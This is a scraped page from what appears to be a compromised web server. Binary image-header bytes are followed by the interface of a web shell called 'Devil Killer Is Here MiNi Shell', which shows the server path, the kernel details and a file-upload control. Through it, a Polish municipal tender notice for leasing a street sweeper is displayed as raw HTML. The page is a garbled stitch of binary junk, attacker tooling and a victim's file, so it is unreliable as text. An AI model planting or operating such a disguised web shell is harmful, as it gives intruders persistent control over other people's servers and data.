JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20231214/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20231214/0055103301-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> DOSTAWA W FORMIE LEASINGU OPERACYJNEGO FABRYCZNIE NOWEJ PRZEGUBOWEJ ZAMIATARKI CHODNIKOWEJ </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZĄBKOWICKIE PRZEDSIĘBIORSTWO USŁUG KOMUNALNYCH SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">ZPUK</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 520237478</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Daleka 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Ząbkowice Śląskie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">57-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL517 - Wałbrzyski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">748151855</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">biuro@zpuk-zabkowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zpuk-zabkowice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - inne państwowe i samorządowe osoby prawne utworzone na podstawie odrębnych ustaw w celu wykonywania zadań publicznych</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> DOSTAWA W FORMIE LEASINGU OPERACYJNEGO FABRYCZNIE NOWEJ PRZEGUBOWEJ ZAMIATARKI CHODNIKOWEJ </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-93ef8434-99b2-11ee-9ee7-e2087ac16d09</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00551033</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-12-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00292968/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 DOSTAWA W FORMIE LEASINGU OPERACYJNEGO FABRYCZNIE NOWEJ PRZEGUBOWEJ ZAMIATARKI CHODNIKOWEJ</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-93ef8434-99b2-11ee-9ee7-e2087ac16d09 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”).<br/>2.	Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na: Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia (w szczególności SWZ) wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia.<br/>3.	Dokumenty i oświadczenia elektroniczne wykonawcy sporządzają zgodnie z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego (Dz. U. z 2020 poz. 2452) tj: - w postaci elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz. U. z 2021 r. poz. 2070 oraz z 2022 r. poz. 1087) tj. <br/>-	opatrują kwalifikowanym podpisem elektronicznym lub <br/>-	podpisem zaufanym lub <br/>-	podpisem osobistym. <br/>Formaty danych, o których mowa powyżej oraz standardy zapewniające dostęp do zasobów informacji udostępnianych za pomocą systemów teleinformatycznych używanych do realizacji zadań publicznych – zawarty jest w załączniku nr 2 do Rozporządzenia Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych. Zamawiający rekomenduje, ażeby ofertę sporządzić w formacie danych pdf. Dopuszcza się także złożenie oferty skompresowanej w formacie .RAR, który to format nie jest wymieniony w powyższym załączniku nr 2 Rozporządzenia w sprawie KRI. Dopuszczalność taką wskazuje orzecznictwo KIO np. sygn 1451/2020. <br/>Zamawiający informuje, że ofertę pierwotnie sporządzoną w formie papierowej następnie przekształconą do postaci elektronicznej np. poprzez jej zeskanowanie i opatrzenie kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym uznane będzie za złożoną we właściwej formie. Powyższe jest zgodne z opinią wydaną przez UZP, która to opinia uwzględnia stanowiska Ministerstwa Cyfryzacji i Polskiej Izby Informatyki i Telekomunikacji uzyskane przez prezesa Urzędu Zamówień Publicznych.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacje zawarte są w pkt. 39 SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Informacje zawarte są w pkt. 39 SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.2.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zamówienie obejmuje dostawę zamiatarki wraz z osprzętem, fabrycznie nowej, produkowanej seryjnie (a nie przygotowanej jedynie dla potrzeb tego postępowania).<br/>•	Rok produkcji - nie starszy niż 2023<br/>•	Zamiatarka podciśnieniowa z układem recyrkulacji wody<br/>•	DMC – do 3,5 tony <br/>•	Konstrukcja przegubowa<br/>•	Prędkość transportowa do 40 km/h<br/>•	wymagana kat. prawa jazdy B do kierowania pojazdem<br/>•	Wymiary zamiatarki wraz z zespołem zamiatającym dwu szczotkowym:<br/>	Wysokość – maksymalnie - 2000 mm ( bez światła sygnalizacyjnego )<br/>	Szerokość – maksymalnie - 1350 mm ( szerokość nośnika narzędzi ) – kryterium oceny oferty<br/>	Długość – maksymalnie - 4600 mm<br/>•	Rozstaw osi – maksymalnie 1600 mm<br/>•	Podwozie 4 kołowe, napęd hydrostatyczny na 4 koła<br/>•	Wysokość pokonywania krawężników – minimum 150 mm<br/>•	Średnica zawracania zamiatarki ze szczotkami pomiędzy ścianami ( wg. EN 15429 ) – maksymalnie 7 m – kryterium oceny oferty<br/>•	Rozmiar opon min R 15 M+S<br/>•	Silnik Diesel – moc minimalna – 55 kW <br/>•	Emisja spalin – minimum Stage V<br/>•	Kabina zamknięta, oszklona, ogrzewana i klimatyzowana, radioodbiornik z bluetooth, Kamera wsteczna, ekran wyświetlany w kolorze<br/>•	Siedzenie umieszczone centralnie, zawieszone pneumatycznie lub hydraulicznie, regulowane<br/>•	Kolor - intensywny pomarańcz ( kolor ogólnie uznany za kolor maszyn komunalnych )<br/>•	Podgrzewane lusterka<br/>•	Oświetlenie LED zgodne z przepisami prawo o ruchu drogowym<br/>•	Światło i akustyczny sygnał cofania<br/>•	Dodatkowa lampa ostrzegawcza na tyle pojazdu<br/>•	Poziom ciśnienia akustycznego (LpA) zgodnie z dyrektywą 2006/42/WE i zgodnie z normą DIN EN ISO 11201 w normalnych warunkach pracy przy 1600 obr./min - max - 72 dB(A)<br/>•	Zespół zamiatający dwu szczotkowy – regulacja szczotek z kabiny operatora w zakresie: szerokość zamiatania, niezależne wychylenie mierzone od osi pojazdu w płaszczyźnie poziomej każdej ze szczotek, prędkość obrotowa; możliwość regulacji pochylenia każdej ze szczotek w płaszczyźnie poziomej prostopadle do kierunku jazdy, system zabezpieczający przed kolizją – jedna ze szczotek możliwość płynnej hydraulicznej regulacji z kabiny operatora kąta pochylenia w osi równoległej i prostopadłej do osi jazdy<br/>•	Szerokość zamiatania – co najmniej - 2200 mm<br/>•	Średnica szczotek – co najmniej 850 mm<br/>•	System szybkiej zmiany narzędzi, dotyczy narzędzi montowanych z przodu jak i z tyłu pojazdu, bez konieczności użycia kluczy lub innych narzędzi <br/>•	Szerokość dyszy ssącej – co najmniej 500 mm<br/>•	Średnica kanału ssącego – co najmniej 180 mm, kanał ssący zamontowany na pojeździe w taki sposób, aby w pozycji roboczej nie wystawał poza obrys pojazdu, brak konieczności demontażu kanału ssącego przy wykorzystaniu pojazdu do prac zimowych (pług, posypywarka)<br/>•	Klapa dużych śmieci sterowana z kabiny operatora<br/>•	Wizjer w podłodze umożliwiający obserwację dyszy ssącej z kabiny operatora<br/>•	Zbiornik na nieczystości – minimum 1500 litrów pojemności klasyfikowalnej zgodnie z EN 15429, ( potwierdzenie załączone do oferty ) wykonany z materiału odpornego na korozję i ścieranie, kiprowanie hydrauliczne<br/>•	Wysokość opróżniania zbiornika minimum 1400 mm<br/>•	Wąż do grawitacyjnego spuszczania wody ze zbiornika na nieczystości<br/>•	Ładowność zbiornika zamiatarki – co najmniej 1000 kg<br/>•	Zbiornik wody czystej – minimum 180 litrów<br/>•	Przyłącze do hydrantu do napełniania zbiornika wody czystej<br/>•	Ręczny wąż ssawny teleskopowy: długość minimum 3,5 m, średnica minimum 120 mm, ( dostosowany do pracy po obu stronach maszyny, z uchwytem, chowany po zakończeniu pracy )<br/>•	Myjka wysokociśnieniowa montowana z tyłu pojazdu, wydajność min. 10 l/min; 100 bar, wyposażona w pistolet ręczny natryskowy z wężem min. 10 m.<br/>•	Certyfikat PM 2,5; PM 10 – potwierdzenie EUnited ( certyfikat )<br/>•	Gwarancja 36 miesięcy liczona od momentu rozpoczęcia sezonu eksploatacyjnego <br/>•	Bezpłatne przeszkolenie dwóch wskazanych przez Zamawiającego pracowników w zakresie obsługi i konserwacji przedmiotu zamówienia<br/>•	Możliwość holowania przyczepy o DMC co najmniej 2000 kg<br/>•	Komplet dokumentów niezbędnych do rejestracji pojazdu na terenie RP<br/>Informacje dodatkowe:<br/>	Wykonawca musi posiadać autoryzację producenta w zakresie sprzedaży i serwisu zamiatarki na terenie RP<br/>	Odległość autoryzowanego serwisu od Zamawiającego nie większa niż 100 km lub serwis mobilny<br/>	Reakcja serwisu gwarancyjnego do 3 dni roboczych od momentu zgłoszenia <br/>	W sytuacji gdy czas naprawy gwarancyjnej lub serwisu (przeglądu) przekroczy 10 dni roboczych, Wykonawca zobowiązuje się do zapewnienia Zamawiającemu pojazdu zastępczego, o parametrach podobnych do pojazdu stanowiący przedmiot umowy w ramach zamówienia.<br/>	Wykonawca zobowiązany jest dostarczyć w dniu przekazania przedmiotu zamówienia:<br/>	- instrukcję w języku polskim<br/>	- katalog części zamiennych w formie obrazkowo numerycznej jako katalog książkowy bądź w formie elektronicznej, na nośniku cyfrowym lub na portalu Dostawcy,<br/>	- kartę gwarancyjną<br/>	- certyfikat PM 2,5; PM10<br/>Zapłata za śmieciarkę nastąpi w formie leasingu operacyjnego. Wykonawca będzie zobowiązany do przedstawienia oferty 59 miesięcznych równych stałych rat leasingowych (kapitał + odsetki) płatnych zgodnie z harmonogramem finansowym, będącym załącznikiem do Umowy oraz uwzględnienie opłaty wstępnej w wysokości 20 % wartości netto zamiatarki oraz wartości resztowej w wysokości 10% wartości netto zamiatarki. Przy kalkulacji należy przyjąć WIBOR1M z dnia publikacji ogłoszenia oraz zmienną stopę procentową.<br/><br/>Ubezpieczenie OC zamiatarki zapewnia Zamawiający. Ubezpieczenie majątkowe zapewnia wykonawca i należy wkalkulować w cenę oferty. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34144430-1 - Pojazdy do zamiatania dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">66114000-2 - Usługi leasingu finansowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z kryteriami oceny ofert przyjętymi w SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Szerokość pojazdu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Średnica zawracania zamiatarki ze szczotkami pomiędzy ścianami</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">oświadczenie o aktualności informacji zawartych w oświadczenia, o którym mowa w art. 125 ust. 1 pzp</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Na ofertę składają się następujące dokumenty:<br/>1)	formularz oferty (formularz interaktywny),<br/>2)	parametry oferowanego pojazdu (zał. nr 1) <br/>3)	oświadczenie o niepodleganiu wykluczeniu (składa każdy z wykonawców - w przypadku wspólnego ubiegania się o zamówienie przez wykonawców)- (zał. 2 SWZ),<br/>4)	oświadczenie składane przez wykonawców wspólnie ubiegających się o udzielenie zamówienia na podstawie art. 117 ust.4. (jeżeli dotyczy, załącznik nr 3 do SWZ)<br/>5)	pełnomocnictwo (jeżeli dotyczy)<br/>6)	zastrzeżenie tajemnicy przedsiębiorstwa (jeżeli dotyczy),<br/>7)	projekt umowy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo należy dołączyć do oferty. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia żaden z Wykonawców nie może podlegać wykluczeniu. Jeżeli w postępowaniu o udzielenie zamówienia publicznego zostanie wybrana<br/>oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 7.	Umowa zostanie zawarta na wzorze przedstawionym przez Wykonawcę w formie załącznika do oferty, z uwzględnieniem postanowień zawartych w niniejszej SWZ. <br/>8.	Strony ustanawiają odpowiedzialność za niewykonanie lub nienależyte wykonanie umowy w formie kar umownych. <br/>	Wykonawca zapłaci Zamawiającemu kary umowne: za zwłokę w dostarczeniu przedmiotu umowy w wysokości 0,2 % wartości wynagrodzenia brutto określonego z dokładnością do 1 zł, za każdy dzień kalendarzowy zwłoki liczony od dnia wyznaczonego na dostarczenie przedmiotu umowy. Za odstąpienie od umowy w wysokości 10 % wartości wynagrodzenia brutto określonego z dokładnością do 10 zł, w przypadku odstąpienia od Umowy którejkolwiek ze stron, z przyczyn za które ponosi odpowiedzialność Wykonawca. <br/>	Zamawiający zapłaci Wykonawcy karę Umowną w wysokości 10 % wartości wynagrodzenia brutto określonego z dokładnością do 10 zł w przypadku odstąpienia od Umowy którejkolwiek ze stron, z przyczyn za które ponosi odpowiedzialność Zamawiający za wyjątkiem sytuacji, o której mowa w art. 456 ustawy Prawo zamówień publicznych. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-12-22 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca przygotowuje ofertę przy pomocy „Formularza ofertowego” udostępnionego przez Zamawiającego na Platformie e-Zamówienia i zamieszczonego w podglądzie postępowania w zakładce „Informacje podstawowe”. 2. Ofertę należy złożyć za pośrednictwem Platformy e-Zamówienia: https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-12-22 09:30</span></h3> <h3 